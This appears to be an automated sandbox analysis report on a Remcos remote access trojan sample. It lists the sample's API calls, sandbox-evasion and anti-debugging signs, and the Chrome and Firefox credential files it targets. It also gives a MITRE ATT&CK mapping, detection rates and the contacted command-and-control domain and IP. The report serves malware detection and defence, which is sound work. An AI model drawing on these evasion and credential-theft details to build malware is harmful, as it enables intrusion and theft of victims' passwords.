                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041BEEE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041BEEE
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004560BF push ecx; ret 1_2_004560D2
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00434206 push ecx; ret 1_2_00434219
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004569F0 push eax; ret 1_2_00456A0E
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00406128 ShellExecuteW,URLDownloadToFileW,1_2_00406128
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00419DBA OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,1_2_00419DBA
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041BEEE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041BEEE
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Delayed program exit found
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0040E627 Sleep,ExitProcess,1_2_0040E627
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,1_2_00419AB8
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeWindow / User API: threadDelayed 3568Jump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeWindow / User API: threadDelayed 5936Jump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeWindow / User API: foregroundWindowGot 1769Jump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe TID: 7728Thread sleep count: 218 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe TID: 7728Thread sleep time: -109000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe TID: 7732Thread sleep count: 3568 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe TID: 7732Thread sleep time: -10704000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe TID: 7732Thread sleep count: 5936 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe TID: 7732Thread sleep time: -17808000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,1_2_0040B335
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,1_2_0040B53A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041B63A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,1_2_0041B63A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0044D7F9 FindFirstFileExA,1_2_0044D7F9
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,1_2_004089A9
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00406AC2 FindFirstFileW,FindNextFileW,1_2_00406AC2
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,1_2_00407A8C
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,1_2_00408DA7
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00418E5F FindFirstFileW,FindNextFileW,FindNextFileW,1_2_00418E5F
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,1_2_00406F06
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753562886.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.00000000006A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753562886.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.00000000006A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWg2
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeAPI call chain: ExitProcess graph end nodegraph_1-48088
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0043A86D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043A86D
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041BEEE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041BEEE
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00442764 mov eax, dword ptr fs:[00000030h]1_2_00442764
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0044EB3E GetProcessHeap,1_2_0044EB3E
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00434378 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00434378
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0043A86D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043A86D
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00433D4F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00433D4F
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00433EE2 SetUnhandledExceptionFilter,1_2_00433EE2
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe1_2_0041100E
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041894A mouse_event,1_2_0041894A
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753562886.00000000006A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753562886.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNY\EZ
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNY\12\Z
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNY\
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNY\WZ
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNY\xZv
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNY\08
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753562886.00000000006A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerf
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753562886.00000000006A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp, logs.dat.1.drBinary or memory string: [Program Manager]
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00434015 cpuid 1_2_00434015
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetLocaleInfoA,1_2_0040E751
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_0045107A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetLocaleInfoW,1_2_004512CA
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: EnumSystemLocalesW,1_2_004472BE
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_004513F3
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetLocaleInfoW,1_2_004514FA
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_004515C7
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetLocaleInfoW,1_2_004477A7
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_00450C8F
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: EnumSystemLocalesW,1_2_00450F52
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: EnumSystemLocalesW,1_2_00450F07
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: EnumSystemLocalesW,1_2_00450FED
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00404915 GetLocalTime,CreateEventA,CreateThread,1_2_00404915
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041A9AD GetComputerNameExW,GetUserNameW,1_2_0041A9AD
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0044804A _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,1_2_0044804A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Remcos RAT
                          Source: Yara matchFile source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.3753688291.000000000228F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Contains functionality to steal Chrome passwords or cookies
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data1_2_0040B21B
                          Contains functionality to steal Firefox passwords or cookies
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\1_2_0040B335
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: \key3.db1_2_0040B335

                          Remote Access Functionality

                          barindex
                          Detected Remcos RAT
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-JLQBNYJump to behavior
                          Yara detected Remcos RAT
                          Source: Yara matchFile source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.3753688291.000000000228F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: cmd.exe1_2_00405042

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                          Native API                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Deobfuscate/Decode Files or Information                          		1
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services11
                          Archive Collected Data                          		12
                          Ingress Tool Transfer                          		Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts12
                          Command and Scripting Interpreter                          		1
                          Windows Service                          		1
                          Bypass User Account Control                          		2
                          Obfuscated Files or Information                          		211
                          Input Capture                          		1
                          Account Discovery                          		Remote Desktop Protocol211
                          Input Capture                          		2
                          Encrypted Channel                          		Exfiltration Over Bluetooth1
                          Defacement
                          Email AddressesDNS ServerDomain Accounts2
                          Service Execution                          		Logon Script (Windows)1
                          Access Token Manipulation                          		1
                          DLL Side-Loading                          		2
                          Credentials In Files                          		1
                          System Service Discovery                          		SMB/Windows Admin Shares3
                          Clipboard Data                          		1
                          Non-Standard Port                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                          Windows Service                          		1
                          Bypass User Account Control                          		NTDS2
                          File and Directory Discovery                          		Distributed Component Object ModelInput Capture1
                          Remote Access Software                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                          Process Injection                          		1
                          Masquerading                          		LSA Secrets23
                          System Information Discovery                          		SSHKeylogging2
                          Non-Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Virtualization/Sandbox Evasion                          		Cached Domain Credentials21
                          Security Software Discovery                          		VNCGUI Input Capture12
                          Application Layer Protocol                          		Data Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Access Token Manipulation                          		DCSync1
                          Virtualization/Sandbox Evasion                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                          Process Injection                          		Proc Filesystem2
                          Process Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          Application Window Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                          System Owner/User Discovery                          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe71%ReversingLabsWin32.Backdoor.Remcos
                          1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe65%VirustotalBrowse
                          1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe100%AviraBDS/Backdoor.Gen
                          1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe100%Joe Sandbox ML

                          Dropped Files

                          No Antivirus matches

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          juanosorio.loseyourip.com0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          geoplugin.net
                          		178.237.33.50
                          		truefalse
                            		high
                            juanosorio.loseyourip.com
                            		179.15.136.6
                            		truetrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
